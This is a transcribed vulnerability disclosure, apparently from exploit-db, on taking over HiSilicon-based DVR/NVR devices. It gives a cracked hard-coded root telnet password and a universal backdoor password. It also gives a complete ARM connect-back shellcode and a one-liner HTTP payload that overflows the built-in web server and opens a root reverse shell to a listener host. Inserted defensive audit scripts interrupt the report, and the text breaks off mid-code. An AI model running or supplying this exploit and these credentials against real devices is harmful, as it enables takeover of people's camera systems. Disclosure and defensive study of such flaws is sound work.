HiSilicon DVR hack (exploit-db.com)
10 Feb 2020 | 24 pages | 1.07 MB

Share Pdf : Hisilicon Dvr Hack Exploit Db Com

Download and Preview : Hisilicon Dvr Hack Exploit Db Com


Report CopyRight/DMCA Form For : Hisilicon Dvr Hack Exploit Db Com



Transcription

contents

- exploring the DVR
- the DVR at a first glance
- obtaining the firmware
- service scanning
- root shell
- telnet interface
- firmware reversing
- remote gdb
- inspect the authentication procedure
- password hash function
- buffer overflow in builtin webserver
- program flow control
- remote code execution
- RCE without ASLR
- defeating ASLR
- post exploitation
- summary

This report discloses serious vulnerabilities, with proof of concept (PoC) code, in DVR/NVR devices built on the HiSilicon hi3520d and similar system on a chip (SoC). Exploiting the vulnerabilities leads to unauthorized remote code execution (RCE) using only the web interface, causing full takeover of the exploited device. Due to the lack of upgraded firmwares, using these devices is not recommended. The vendor was contacted before Dec 2016 but there has still been no response. The release date of the disclosure is Feb 2017.

A couple of years ago I bought a cheap Chinese DVR device on eBay. The boot logo of the device says "SECULINK Security Monitoring". As an IT security enthusiast I decided to have a closer look at the device to see how secure that security monitoring service is. Googling about the topic I found some interesting materials, but digging deeper I found much more interesting and much more serious issues (0-days) in the device.

Let us have a look at the full hacking session from the beginning. New findings of my own will be noted, as will the previously known ones.

exploring the DVR

First we should learn the official user interface, then dig deeper and maybe try to obtain the firmware. The chances of finding vulnerabilities increase once we have the firmware.

the DVR at a first glance

The DVR device intended for testing is branded as Seculink.
Available physical interfaces:

- 2x USB ports (officially for a mouse to control the GUI console)
- HDMI port and VGA for attaching an external monitor (GUI camera views)
- 4x BNC connectors for analogue CCTV cameras
- SATA port inside for attaching storage for recording the video stream
- Ethernet port for network access

Official user interfaces:

- direct access using HDMI or VGA as output and a USB mouse/keyboard as input (camera view control, full setup)
- network access through HTTP (camera view control)

The directly accessible setup interface is restricted by user authentication (username/password). The default superuser is admin, the default password is blank. After setting up a strong password the user may feel safe that his/her camera view is not accessible by others. People often forward the web port (tcp/80) of the DVR device to the WAN side from their secure LAN in order to access the DVR streams from outside (we may check this e.g. by a suitable Shodan search).

obtaining the firmware

There may be lots of ways of getting the firmware:

- get it from the device by some soft method (using the official interface or exploiting some vulnerability),
- get it from the device by some hard method (JTAG, serial console, etc.),
- find and download it from the internet if it is available.

Although the latter (download) method works here and is the easiest, let us try the first one because it gives other information about the device too.

service scanning

Let us do a full port scan on the DVR. Note that the default (if run by root) SYN scan is very slow because of dropped packets, but the full TCP connect scan finishes in a couple of minutes.

```
# Nmap 7.40 scan initiated Sun Sep  3 01:57:47 2017 as: nmap -v -sV -sT -p- -oA nmap_full 192.168.88.127
Nmap scan report for dvr.lan (192.168.88.127)
Host is up (0.028s latency).
Not shown: 65529 closed ports
PORT      STATE SERVICE      VERSION
23/tcp    open  telnet       BusyBox telnetd
80/tcp    open  http         uc-httpd 1.0.0
554/tcp   open  rtsp         LuxVision or Vacron DVR rtspd
9527/tcp  open  unknown
34567/tcp open  dhanalakshmi
34599/tcp open  unknown
MAC Address: 00:12:12:15:B3:E7 (Plus)
Service Info: Host: LocalHost; Device: webcam
# Nmap done at Sun Sep  3 02:00:42 2017 -- 1 IP address (1 host up) scanned in 174.79 seconds
```

Summarizing and manual testing:

- 23/tcp is a telnet login interface protected by some username/password (not the application credentials).
- 80/tcp is the web interface protected by the application credentials.
- 554/tcp is an rtsp service; it can be opened by a common rtsp url: rtsp://192.168.88.127:554/user=admin&password=&channel=1&stream=0.sdp. Note that opening the rtsp stream requires credentials as well.
- 9527/tcp seems to be a "secret" service port with some very interesting features.
- 34567/tcp and 34599/tcp seem to be some data ports related to the DVR application.

Here we should state that the device is probably some Linux-like system.

Connecting to 9527/tcp by raw netcat shows the application console with logging messages and a login prompt. Logging in with any of the defined application credentials works. Issuing help after the prompt gives a short description of the console commands. The command shell seems to be the most interesting. Yes, it gives a root shell on the device.

Note that this is obviously a serious security issue, because a low privileged application user should not get a root shell on the device automatically.

root shell

Exploring the device in the root shell (e.g. by dmesg) makes it obvious that the DVR is running a Linux kernel version 3.0.8, it has an ARMv7 CPU, and the SoC model is hi3520d.

From the list of running processes (ps) it is clear that the DVR application is /var/Sofia, which is listening on 34568/udp and 34569/udp as well, besides the above tcp ports detected by nmap (netstat -nlup).

From the list of mounted disks (mount command) it is clear that the firmware image is in the /dev/mtdblockX devices, where X = 0, 1, 2, 3, 4, 5.

The firmware is small and therefore restricted, so we should be creative if we want to copy files to/from the device. Fortunately NFS is supported, so setting up an NFS server on our desktop machine and mounting it from the DVR solves the problem:

```
mount -t nfs 192.168.88.100:/nfs /home -o nolock
```

Now obtaining the firmware is straightforward:

```
cat /dev/mtdblock1 > /home/mtdblock1_root.img
cat /dev/mtdblock2 > /home/mtdblock2_usr.img
cat /dev/mtdblock3 > /home/mtdblock3_custom.img
cat /dev/mtdblock4 > /home/mtdblock4_logo.img
cat /dev/mtdblock5 > /home/mtdblock5_mtd.img
```

We may get the files, not just the raw images:

```
cp /var/Sofia /home
tar cf /home/fs.tar /bin /boot /etc /lib /linuxrc /mnt /opt /root /sbin /share /slv
```

telnet interface

For accessing the device through the telnet interface (port 23/tcp) we may need some OS credentials. Looking at /etc/passwd we have the password hash for the root user:

```
root:absxcfbgXtb3o:0:0:root:/:/bin/sh
```

Note that there is no other user than root, everything is running with full privileges. So if someone breaks into the device somehow, there is no barrier, the attacker gains full power immediately.

Assuming a six-char alphanumeric lowercase password, hashcat cracks the above weak DES hash:

```
$ hashcat64.bin -a3 -m1500 absxcfbgXtb3o -1 ?l?d ?1?1?1?1?1?1
absxcfbgXtb3o:xc3511

Session..........: hashcat
Status...........: Cracked
Hash.Type........: descrypt, DES (Unix, Traditional DES)
Hash.Target......: absxcfbgXtb3o
Time.Started.....: Sun Sep  3 03:25:07 2017 (2 mins, 29 secs)
Time.Estimated...: Sun Sep  3 03:27:36 2017 (0 secs)
Guess.Mask.......: ?1?1?1?1?1?1 [6]
Guess.Charset....: -1 ?l?d, -2 Undefined, -3 Undefined, -4 Undefined
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....:   815.9 kH/s (203.13ms)
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 121360384/2176782336 (5.58%)
Rejected.........: 0/121360384 (0.00%)
Restore.Point....: 93440/1679616 (5.56%)
Candidates.#1....: sa8711 -> h86ani
HWMon.Dev.#1.....: N/A

Started: Sun Sep  3 03:25:04 2017
Stopped: Sun Sep  3 03:27:38 2017
```

So with user root and password xc3511, logging in through the telnet interface on port 23/tcp is possible. This hard-coded root account, accessible on the unclosable telnet interface, is obviously a serious security issue.

These results were almost all available from others before our research, but the following is completely new.

firmware reversing

Exploring the firmware, it turns out that the binary /var/Sofia is the main application which implements every interface, besides video processing and other things. So this binary seems to be the most interesting for us. Unfortunately it is statically linked and stripped, which makes static analysis harder.
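The root-only /etc/passwd and its DES hash are exactly what a firmware audit should catch before a device goes online. The following Python 3 script is an added example and not part of the report: it parses passwd contents (the single root line quoted above, plus a constructed hardened layout for comparison), flags empty password fields, legacy 13-character DES crypt hashes, extra uid 0 accounts and hashes matching a table of known hard-coded defaults, and reports whether any account runs unprivileged at all. The KNOWN_DEFAULT_HASHES table holds only the hash from this report; the hardened sample's SHA-512 hash is a placeholder, and the function names are this example's own.

```python
import re

# Known hard-coded root hashes. absxcfbgXtb3o is the DES hash from the report
# (cracked above to xc3511); extend the table as further defaults become known.
KNOWN_DEFAULT_HASHES = {
    "absxcfbgXtb3o": "xc3511, hard-coded HiSilicon/XM DVR root password",
}

# Traditional DES crypt(3): a 2-character salt followed by 11 hash characters.
DES_CRYPT_RE = re.compile(r"^[./0-9A-Za-z]{13}$")
NOLOGIN_SHELLS = ("/sbin/nologin", "/usr/sbin/nologin", "/bin/false")


def parse_passwd(text):
    """Yield the seven colon-separated fields of each passwd entry, skipping blanks and comments."""
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            fields = line.split(":")
            if len(fields) == 7:
                yield fields


def audit_passwd(text):
    """Return (username, finding) pairs for the weaknesses found in a passwd file's contents."""
    findings = []
    for user, pw_hash, uid, gid, gecos, home, shell in parse_passwd(text):
        if uid == "0" and user != "root":
            findings.append((user, "extra uid 0 account"))
        if pw_hash == "":
            findings.append((user, "empty password field"))
        elif pw_hash in KNOWN_DEFAULT_HASHES:
            findings.append((user, "known hard-coded default: " + KNOWN_DEFAULT_HASHES[pw_hash]))
        elif DES_CRYPT_RE.match(pw_hash):
            findings.append((user, "legacy DES crypt hash, 8 significant characters, fast to brute force"))
    return findings


def has_privilege_separation(text):
    """True if some account with a real login shell runs with a non-zero uid,
    i.e. not everything on the box is root (the report found root only)."""
    return any(uid != "0" and shell not in NOLOGIN_SHELLS
               for _, _, uid, _, _, _, shell in parse_passwd(text))


# Constructed sample inputs: the first is the single root line quoted in the
# report, the second a hypothetical hardened layout (its hash value is a placeholder).
DVR_PASSWD = "root:absxcfbgXtb3o:0:0:root:/:/bin/sh\n"
HARDENED_PASSWD = (
    "root:$6$placeholdersalt$placeholderhash:0:0:root:/root:/bin/sh\n"
    "dvrsvc:x:1000:1000:DVR service:/var/dvr:/sbin/nologin\n"
    "operator:x:1001:1001::/home/operator:/bin/sh\n"
)

if __name__ == "__main__":
    for name, contents in (("DVR", DVR_PASSWD), ("hardened", HARDENED_PASSWD)):
        print(name, "privilege separation:", has_privilege_separation(contents))
        for user, finding in audit_passwd(contents):
            print("  ", user, "->", finding)
```

Run it against /etc/passwd from an extracted firmware image (the fs.tar above, for instance); a device whose only account is a uid 0 root with a 13-character hash fails both checks, which is the situation the telnet section describes.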
Checking the binary with file confirms this:

```
$ file Sofia
Sofia: ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), statically linked, stripped, with debug_info
```

So besides static analysis (with radare2 or IDA), dynamic analysis should be very helpful.

remote gdb

For dynamic analysis, attaching the GNU Project debugger (GDB) to the remote /var/Sofia application should be advantageous. The recommended method is to run and attach gdbserver on the remote device and connect gdb to it from the local machine.

Of course we need a gdbserver compiled (preferably statically) for the appropriate ARM architecture. In order to build it we may use uClibc, which is the recommended C library for embedded systems like our DVR. The available builds are dynamic builds, which are problematic on our DVR, so we should make custom static builds ourselves. There is a nice build environment called Buildroot which makes building work out of the box: select the required apps (e.g. gdb) with make menuconfig (do not forget to choose static libraries), then run make.

After a short build time (10-15 mins) all the necessary tools should be available. The static binaries can be transferred to the device by the previously mentioned NFS method. Note that the directory /var containing the Sofia binary is a ramfs, so it is not persistent across reboots. If we want to transfer the binaries (almost) permanently, the rw partition /mnt/mtd containing the configuration files should be a suitable target. If you build the package openssh too, scp will be available, which makes transferring files easier.

Now the firmware is ready for some reversing. Attaching gdbserver remotely works now (getting the PID of the Sofia process is easy by ps):

```
/mnt/mtd/gdbserver --attach :2000 610
```

Connecting from the local machine:

```
gdb -ex 'set gnutarget elf32-littlearm' -ex 'target remote 192.168.88.127:2000'
```

Note that using some GDB extension like GEF is recommended. If pausing the application does not work with C-c for some reason, sending a TRAP signal to the Sofia process (kill -TRAP 610) should pause it.

inspect the authentication procedure

The recommended tool for static analysis is obviously Hex-Rays' IDA Pro. Unfortunately it is not cheap, but it is much better than any other tool.

There are ~15,000 functions after the initial auto analysis, but finding the auth function is just a moment with IDA using simple Python scripting. The IDAPython snippet below searches for all functions that reference anything related to "Users" and "Password" at the same time:

```python
# IDAPython (legacy API): collect the functions referencing any name
# containing 'Users' (x1) or 'Password' (x2), then print the intersection.
x1, x2 = set(), set()
for loc, name in Names():
    if 'Users' in name:
        for addr in XrefsTo(loc):
            x1.add(GetFunctionName(addr.frm))
    elif 'Password' in name:
        for addr in XrefsTo(loc):
            x2.add(GetFunctionName(addr.frm))
print x1 & x2
```

The result is only one function: sub_2D857C. A quick analysis of this function confirms that this should be the authentication function.

There is an initial check of the cleartext password against a hardcoded string before getting the password hash of the user from the config. If it passes, authentication is granted. This is an ugly backdoor in the application. The universal password is I0TO5Wv9.

With this password we can access anything in the application as any user (e.g. admin). For example, getting the video stream:

```
cvlc 'rtsp://192.168.88.127:554/user=admin&password=I0TO5Wv9&channel=1&stream=0.sdp'
```

Or getting a root shell on the application console (9527/tcp) also works:

```
$ nc 192.168.88.127 9527
nc: using stream socket
username:admin
password:I0TO5Wv9
login admin Console address
```

One more interesting result in the authentication algorithm: in some circumstances the auth function accepts not just the password but the hash too. Opening the rtsp video stream is possible not just with the password but with the hash, which is stored in /mnt/mtd/Config/Account1. For example tlJwpbo6 is the hash of the empty password (see the next section too), so besides

```
cvlc 'rtsp://192.168.88.127:554/user=admin&password=&channel=1&stream=0.sdp'
```

the following also works:

```
cvlc 'rtsp://192.168.88.127:554/user=admin&password=tlJwpbo6&channel=1&stream=0.sdp'
```

password hash function

Another result of the deeper static analysis of the auth function: the password hash function is sub_3DD5E4. It is basically MD5 with some strange transformations. Reversed and implemented in Python:

```python
import hashlib

def sofia_hash(msg):
    h = ''
    msg_md5 = hashlib.md5(msg).digest()
    for i in range(8):
        # fold each pair of MD5 bytes into one alphanumeric character
        n = (ord(msg_md5[2 * i]) + ord(msg_md5[2 * i + 1])) % 0x3e
        if n > 9:
            n += 61 if n > 35 else 55   # 'a'-'z' or 'A'-'Z'
        else:
            n += 0x30                   # '0'-'9'
        h += chr(n)
    return h
```

With the implemented hash algorithm, brute forcing passwords or setting arbitrary passwords is possible.

buffer overflow in builtin webserver

The Sofia binary handles the HTTP requests on port 80/tcp. Let us try some fuzzing with the requests. Of course attaching gdb (see above) should be helpful. Actually we should kill the Sofia process and restart it with gdbserver to see the console output as well:

```
/mnt/mtd/gdbserver :2000 /var/Sofia
```

And locally:

```
gdb -q -ex 'set gnutarget elf32-littlearm' -ex 'target remote 192.168.88.127:2000'
```
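Going back to the hash function of the previous section: the following is a Python 3 port added here as an example, not code from the report. It checks itself against the report's test vector (the empty password hashes to tlJwpbo6), computes the size of the hash's output space, and shows the audit a device owner can run on a hash read from /mnt/mtd/Config/Account1: comparing it against a short list of default passwords. The function names and the candidate list are this example's own assumptions.

```python
import hashlib
import hmac
import math


def sofia_hash(password):
    """Python 3 port of the Sofia password hash reversed above: MD5 of the
    password, then each pair of digest bytes is folded into one character of
    [0-9A-Za-z], giving an 8-character unsalted hash."""
    digest = hashlib.md5(password.encode("utf-8")).digest()
    out = []
    for i in range(8):
        n = (digest[2 * i] + digest[2 * i + 1]) % 0x3e
        if n > 9:
            n += 61 if n > 35 else 55   # 36..61 -> 'a'..'z', 10..35 -> 'A'..'Z'
        else:
            n += 0x30                   # 0..9 -> '0'..'9'
        out.append(chr(n))
    return "".join(out)


def hash_space_bits():
    """Upper bound on the work an offline guess needs: the output is one of
    62**8 strings (about 47.6 bits), however long the password is."""
    return 8 * math.log2(62)


# Constructed list of default/common passwords for the audit below.
COMMON_DEFAULTS = ["", "admin", "123456", "password", "12345", "1234", "888888", "666666"]


def weak_password_for(stored_hash, candidates=COMMON_DEFAULTS):
    """Return the candidate whose hash equals the stored one (as read from
    /mnt/mtd/Config/Account1 on a device you own), or None."""
    for candidate in candidates:
        if hmac.compare_digest(sofia_hash(candidate), stored_hash):
            return candidate
    return None


if __name__ == "__main__":
    print("hash('') =", sofia_hash(""))            # tlJwpbo6, as in the report
    print("output space: %.1f bits" % hash_space_bits())
    print("weak password for tlJwpbo6:", repr(weak_password_for("tlJwpbo6")))
```

Two things follow for anyone operating such a device: the output space is far smaller than an 8-character password suggests, and because the auth function accepts the stored hash in place of the password, the Config directory has to be treated as a credential store, not as a list of one-way digests.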
Now let us see the GET requests. No response:

```
echo GET | nc 192.168.88.127 80
```

Normal response even without proper closing and/or newline at the end:

```
echo -ne 'GET / HTTP' | nc 192.168.88.127 80
```

Test for some overflow with a looong request:

```
python -c 'print "GET " + "a"*1000 + " HTTP"' | nc 192.168.88.127 80
```

Nice! The response is a 200 with a "404 File Not Found" message, but we can see a wonderful crash in the gdb.

Note that there is a watchdog kernel module enabled for the Sofia application. If it is not running for a minute, the device reboots. This is good on the one hand if we experiment with a remote device, but bad on the other if we want to do some debugging smoothly.

The watchdog cannot be turned off once it has been started, so the only way to get rid of it is to modify the read-only firmware by reflashing. It is not recommended unless we want to brick our test device.

program flow control

Why is the crash wonderful from an attacker's view? The remote process (Sofia) got SIGSEGV (segmentation fault), the stack is filled up with our "a" characters, but most importantly the pc (program counter) register has our injected value 0x61616160 ("aaaa" - 1) in it, probably triggered by a ret, but the cause is not important. This should be a classical stack overflow, and this means that we have the chance to control the program flow easily.

After some experimenting by interval halving:

```
python -c 'print "GET 0123" + "a"*(299-4) + "wxyz HTTP"' | nc 192.168.88.127 80
```

This results in SIGSEGV too, and the pc register is 0x7a797876 ("wxyz" reversed because the byte ordering is little endian, and -1 because of alignment). Our payload starts with "0123aaa..." at sp+0x14 (stack base + 0x14).

remote code execution

Exploiting such an overflow most easily and effectively is done by injecting some shellcode into the stack and redirecting the program flow there. This way we get arbitrary remote code execution on the target. Because there is no privilege separation on the device OS, this means full control (root shell). However, there may be modern exploit mitigation techniques enabled which could make an attacker's life much harder.

The most basic way of protecting against shellcodes on the stack is the No eXecute (NX) bit technology. This can prevent executing code on selected memory pages, usually pages with write permission like the stack. Fortunately (from the view of the attacker) there is no NX bit set (look at the STACK flags):

```
$ objdump -b elf32-littlearm -p Sofia

Sofia:     file format elf32-littlearm

Program Header:
0x70000001 off    0x00523f34 vaddr 0x0052bf34 paddr 0x0052bf34 align 2**2
         filesz 0x000132a8 memsz 0x000132a8 flags r--
    LOAD off    0x00000000 vaddr 0x00008000 paddr 0x00008000 align 2**15
         filesz 0x005371dc memsz 0x005371dc flags r-x
    LOAD off    0x005371dc vaddr 0x005471dc paddr 0x005471dc align 2**15
         filesz 0x000089c8 memsz 0x000dad8c flags rw-
     TLS off    0x005371dc vaddr 0x005471dc paddr 0x005471dc align 2**2
         filesz 0x00000004 memsz 0x00000018 flags r--
   STACK off    0x00000000 vaddr 0x00000000 paddr 0x00000000 align 2**2
         filesz 0x00000000 memsz 0x00000000 flags rwx
private flags = 5000002: [Version5 EABI] <Unrecognised flag bits set>
```
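What objdump -p and checksec read off the binary is the PT_GNU_STACK program header (the STACK line above). The following Python 3 parser is an added example, not the report's or the Sofia project's code: it walks the ELF32 program header table, reports whether the image asks for an executable stack, and builds a constructed minimal ELF32 ARM image (reusing the e_flags value 0x5000002 printed above, otherwise placeholder values) to exercise both the rwx and rw- cases. Pass a file path to check a binary extracted from your own firmware; the function names are this example's own.

```python
import struct
import sys

PT_LOAD = 1
PT_GNU_STACK = 0x6474e551          # shown as "STACK" by objdump -p
PF_X, PF_W, PF_R = 1, 2, 4
ELF32_EHDR = "<16sHHIIIIIHHHHHH"  # 52-byte ELF32 header, little endian
ELF32_PHDR = "<IIIIIIII"          # p_type p_offset p_vaddr p_paddr p_filesz p_memsz p_flags p_align


def program_headers(elf):
    """Return [(p_type, p_flags), ...] from a little-endian ELF32 image (bytes)."""
    if elf[:4] != b"\x7fELF" or elf[4] != 1 or elf[5] != 1:
        raise ValueError("not a little-endian ELF32 image")
    ehdr = struct.unpack_from(ELF32_EHDR, elf, 0)
    phoff, phentsize, phnum = ehdr[5], ehdr[9], ehdr[10]
    headers = []
    for i in range(phnum):
        ph = struct.unpack_from(ELF32_PHDR, elf, phoff + i * phentsize)
        headers.append((ph[0], ph[6]))
    return headers


def flags_to_str(p_flags):
    """Render p_flags the way objdump does (e.g. 'rwx')."""
    return (("r" if p_flags & PF_R else "-") +
            ("w" if p_flags & PF_W else "-") +
            ("x" if p_flags & PF_X else "-"))


def stack_is_executable(elf):
    """True when the image asks for an executable stack. A missing PT_GNU_STACK
    header also counts as executable: on 32-bit ARM the kernel then falls back
    to an executable stack, which is what checksec's NX column reports."""
    for p_type, p_flags in program_headers(elf):
        if p_type == PT_GNU_STACK:
            return bool(p_flags & PF_X)
    return True


def build_minimal_elf32(stack_flags):
    """Constructed test input (not a runnable program): an ELF32 ARM image with
    one PT_LOAD and one PT_GNU_STACK header. e_flags 0x5000002 is the value
    objdump printed for Sofia above; the other fields are placeholders."""
    e_ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + bytes(8)   # ELFCLASS32, little endian, version 1
    ehdr = struct.pack(ELF32_EHDR, e_ident, 2, 40, 1, 0x8000, 52, 0, 0x5000002,
                       52, 32, 2, 0, 0, 0)                    # e_machine 40 = EM_ARM, 2 program headers
    load = struct.pack(ELF32_PHDR, PT_LOAD, 0, 0x8000, 0x8000, 0x1000, 0x1000, PF_R | PF_X, 0x8000)
    stack = struct.pack(ELF32_PHDR, PT_GNU_STACK, 0, 0, 0, 0, 0, stack_flags, 4)
    return ehdr + load + stack


if __name__ == "__main__":
    if len(sys.argv) > 1:                       # e.g. python3 stackcheck.py Sofia
        images = {sys.argv[1]: open(sys.argv[1], "rb").read()}
    else:
        images = {"constructed rwx": build_minimal_elf32(PF_R | PF_W | PF_X),
                  "constructed rw-": build_minimal_elf32(PF_R | PF_W)}
    for name, data in images.items():
        for p_type, p_flags in program_headers(data):
            if p_type == PT_GNU_STACK:
                print("%s: STACK flags %s" % (name, flags_to_str(p_flags)))
        print("%s: %s" % (name, "NX disabled (executable stack)" if stack_is_executable(data) else "NX enabled"))
```

For a vendor fix the relevant knob is the linker: building with a non-executable stack (no assembler object requesting an executable stack, or linking with -z noexecstack) flips the STACK flags to rw-, which this check would then report as NX enabled.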
Alternatively, checksec in gdb-gef shows the same; checksec also tells us that there are no other mitigations present, such as a stack canary, which is obvious because we could not have controlled pc with a stack overflow if a stack canary were present.

The only thing we should know before getting the RCE to work is the stack address. We should inject the address sp+0x14 in the appropriate position of our payload (wxyz above) in order to redirect the program flow to the shellcode.

There is also a mitigation technique which could make this harder or very hard (almost impossible in some cases): address space layout randomization (ASLR). ASLR randomizes the base addresses of the memory segments, e.g. the base address of the stack. Out of luck, ASLR is enabled (2 means full randomization, 0 is disabled):

```
cat /proc/sys/kernel/randomize_va_space
```

RCE without ASLR

Let us try to exploit the overflow first with ASLR turned off:

```
echo 0 > /proc/sys/kernel/randomize_va_space
```

Following the above procedure we get that the stack address (sp) is 0x5a26f3d8 at the time of the SIGSEGV crash, and it is the same in different runs with ASLR turned off. So the payload should be:

```
python -c 'print "GET " + shellcode + "a"*(299-len(shellcode)) + "\xd8\xf3\x26\x5a" + " HTTP"' | nc 192.168.88.127 80
```

where the shellcode should be something we want to execute, preferably a connect-back shellcode. Note that there are badchars which must be avoided: 0x00, 0x0d, 0x0a (\n), 0x20, 0x26, 0x3f. Moreover there is a 299 byte size limit. Shellcode generators cannot deal with our badchar list; even using automated encoders cannot solve the problem because of the size limit.

So a custom shellcode should be generated. The shellcode here gives a connect-back shell using the socket, connect, dup2 and execve system calls (or supervisor calls, according to the terminology of the ARM world). We have to be strict and creative in order to avoid badchars. Labels should not be used, those are just for easier readability.

```asm
.section .text
.global _start
_start:
    @ ensure switching to thumb mode (arm mode instructions)
    .code 32
    add r1, pc, #1          @ 00
    bx r1                   @ 04

    @ thumb mode instructions
    .code 16
    @ *(0x52) -= 1 (port -= 0x100): make it possible to use port numbers < 1024
    add r1, pc, #68         @ 08: r1 = pc + 68 = 0xc + 68 = 0x50
    ldrb r2, [r1, #2]       @ 0a: r2 = *(0x52)
    sub r2, #1              @ 0c: r2 = r2 - 1
    strb r2, [r1, #2]       @ 0e: *(0x52) = r2

    @ socket(2, 1, 0): socket(AF_INET, SOCK_STREAM, 0)
    mov r1, #2              @ 10: r1 = 2
    add r0, r1, #0          @ 12: r0 = r1 + 0 = 2
    mov r1, #1              @ 14: r1 = 1
    sub r2, r2, r2          @ 16: r2 = r2 - r2 = 0
    lsl r7, r1, #8          @ 18: r7 = r1 << 8 = 1 << 8 = 256
    add r7, #25             @ 1a: r7 = r7 + 25 = 281
    svc 1                   @ 1c: r0 = svc_281(r0, r1, r2) = socket(2, 1, 0)

    @ connect(r0, 0x50, 16): connect(socket, struct addr, addr_len)
    add r6, r0, #0          @ 1e: r6 = r0 + 0 = socket
    add r1, pc, #44         @ 20: r1 = pc + 44 = 0x24 + 44 = 0x50
    mov r3, #2              @ 22: r3 = 2
    strh r3, [r1, #0]       @ 24: *(0x50) = 2
    mov r2, #16             @ 26: r2 = 16
    add r7, #2              @ 28: r7 = r7 + 2 = 283
    svc 1                   @ 2a: r0 = svc_283(r0, r1, r2) = connect(socket, 0x50, 16)

    @ attach stdin/stdout/stderr to the socket: dup2(r0, 0), dup2(r0, 1), dup2(r0, 2)
    mov r7, #62             @ 2c: r7 = 62
    add r7, #1              @ 2e: r7 = r7 + 1 = 63
    mov r1, #200            @ 30: r1 = 200
    add r0, r6, #0          @ 32: r0 = r6 + 0 = socket
    svc 1                   @ 34: r0 = svc_63(r0, r1) = dup2(socket, 0..200)
    sub r1, #1              @ 36: r1 = r1 - 1
    bpl .-6                 @ 38: bpl 0x32, loop until r1 < 0: dup2 every fd to the socket

    @ execve("/bin/sh", NULL, NULL)
    add r0, pc, #28         @ 3a: r0 = pc + 28 = 0x3c + 28 = 0x58
    sub r2, r2, r2          @ 3c: r2 = r2 - r2 = 0
    strb r2, [r0, #7]       @ 3e: *(0x58 + 7) = 0: terminate "/bin/sh" with \x00
    push {r0, r2}           @ 40: sp -> [0x58, 0x0] (r0, r2)
    mov r1, sp              @ 42: r1 = sp
    mov r7, #11             @ 44: r7 = 11
    svc 1                   @ 46: svc_11(r0, r1, r2) = execve("/bin/sh\x00", ["/bin/sh", NULL], NULL)
    mov r7, #1              @ 48: r7 = 1
    add r0, r7, #0          @ 4a: r0 = r7 + 0 = 1
    svc 1                   @ 4c: svc_1(r0) = exit(1)
    mov r8, r8              @ 4e: thumb nop (0x46c0 in the dump below), keeps the struct at 0x50

    @ struct sockaddr: sa_family = 0x0002 (set by the shellcode), sa_data = port, ip
    .short 0xffff           @ 50
    .short 0x697b           @ 52: port = 31377 = hex(31337 + 0x100) in little endian
    .byte 192, 168, 88, 100 @ 54: inet_addr("192.168.88.100")
    .ascii "/bin/shX"       @ 58: X will be replaced with \x00 by the shellcode
    .word 0xefbeadde        @ "deadbeef"
```

Compiling the shellcode and getting the raw binary bytes using any cross tool for ARM should work, e.g. the ones built using buildroot (in buildroot-2017.02.5/output/host/usr/bin) are good too:

```
armv7a-hardfloat-linux-gnueabi-as shellcode.S -o shellcode.o
armv7a-hardfloat-linux-gnueabi-ld.bfd shellcode.o -o shellcode
armv7a-hardfloat-linux-gnueabi-objcopy -O binary --only-section=.text shellcode shellcode.bin
cat shellcode.bin | xxd -p
01108fe211ff2fe111a18a78013a8a700221081c0121921a0f02193701df
061c0ba102230b801022023701df3e270137c821301c01df0139fbd507a0
921ac27105b469460b2701df0127381c01dfc046ffff7b69c0a858642f62
696e2f736858deadbeef
```

Injecting this with the payload should make the exploit work, and it should give a connect-back shell from the remote device.

Of course, first start a listener on 192.168.88.100:

```
nc -nvlp 31337
```

Then start up the payload:

```
python -c 'shellcode = "01108fe211ff2fe111a18a78013a8a700221081c0121921a0f02193701df061c0ba102230b801022023701df3e270137c821301c01df0139fbd507a0921ac27105b469460b2701df0127381c01dfc046ffff7b69c0a858642f62696e2f736858deadbeef".decode("hex"); print "GET " + shellcode + "a"*(299-len(shellcode)) + "\xec\xf3\x26\x5a" + " HTTP"' | nc 192.168.88.127 80
nc: using stream socket
HTTP/1.0 200 OK
Content-type: application/binary
Server: uc-httpd 1.0.0

<html><head><title>404 File Not Found</title></head>
<body>The requested URL was not found on this server</body></html>
```

The exploit should work. In the local gdb:

```
process 1064 is executing new program: /bin/busybox
Reading /bin/busybox from remote target...
Reading /bin/busybox from remote target...
```

And the RCE is ready on the netcat listener:

```
nc: connect to 192.168.88.100 31337 from 192.168.88.127 55442
nc: using stream socket
```

Now executing arbitrary commands as root on the remote system is possible.
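From the defender's side, the over-long GET request that crashes uc-httpd is easy to recognise before it reaches the DVR. The Python 3 function below is an added example (not from the report) of the logic a filtering proxy or IDS rule in front of such a device would apply: it parses the raw request line and flags an oversized request-target, non-printable bytes, a long run of one repeated byte, and a missing or malformed HTTP version. The sample requests are constructed; the 255-byte limit and the placeholder bytes in the "binary" sample are this example's assumptions, not values from the report.

```python
import re

MAX_TARGET_LEN = 255   # assumption for this demo: the crash above needs only ~300 bytes of request-target
REQUEST_LINE_RE = re.compile(rb"^([A-Z]+) (\S+)(?: (\S+))?$")


def inspect_request_line(raw):
    """Inspect the first line of a raw HTTP request (bytes) and return the
    reasons it should not be forwarded to an embedded web server such as
    uc-httpd. An empty list means the request line looks ordinary."""
    first_line = raw.split(b"\n", 1)[0].rstrip(b"\r")
    m = REQUEST_LINE_RE.match(first_line)
    if not m:
        return ["malformed request line"]
    method, target, version = m.groups()
    reasons = []
    if version is None or not version.startswith(b"HTTP/"):
        reasons.append("missing or invalid HTTP version")
    if len(target) > MAX_TARGET_LEN:
        reasons.append("request-target too long (%d bytes > %d)" % (len(target), MAX_TARGET_LEN))
    if any(b < 0x20 or b > 0x7e for b in target):
        reasons.append("non-printable bytes in request-target")
    if re.search(rb"(.)\1{31,}", target):
        reasons.append("run of 32+ identical bytes in request-target (overflow padding)")
    return reasons


def should_block(raw):
    """Convenience wrapper: True when any reason was found."""
    return bool(inspect_request_line(raw))


# Constructed sample request lines: an ordinary request, the 1000-byte request
# that crashed Sofia above, a truncated line, and a target carrying raw bytes
# (placeholder bytes 0x01..0x07 stand in for machine code; not the report's payload).
SAMPLE_REQUESTS = {
    "normal": b"GET /index.html HTTP/1.1\r\nHost: dvr.lan\r\n\r\n",
    "fuzz": b"GET " + b"a" * 1000 + b" HTTP\n",
    "truncated": b"GET\n",
    "binary": b"GET " + bytes(range(1, 8)) + b"a" * 292 + b"\xec\xf3\x26\x5a" + b" HTTP\n",
}

if __name__ == "__main__":
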